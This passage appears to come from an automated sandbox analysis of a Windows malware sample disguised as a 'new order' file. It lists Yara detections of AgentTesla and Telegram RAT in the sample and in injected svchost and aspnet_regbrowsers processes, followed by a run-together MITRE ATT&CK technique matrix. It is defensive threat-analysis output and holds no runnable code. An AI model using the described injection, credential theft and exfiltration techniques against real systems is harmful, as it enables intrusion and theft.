                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Telegram RATShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Create Account1Process Injection212Disable or Modify Tools11OS Credential DumpingFile and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1Scheduled Task/Job1Scheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery113Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Registry Run Keys / Startup Folder21Registry Run Keys / Startup Folder21Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery321Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading221Cached Domain CredentialsVirtualization/Sandbox Evasion141VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion141DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
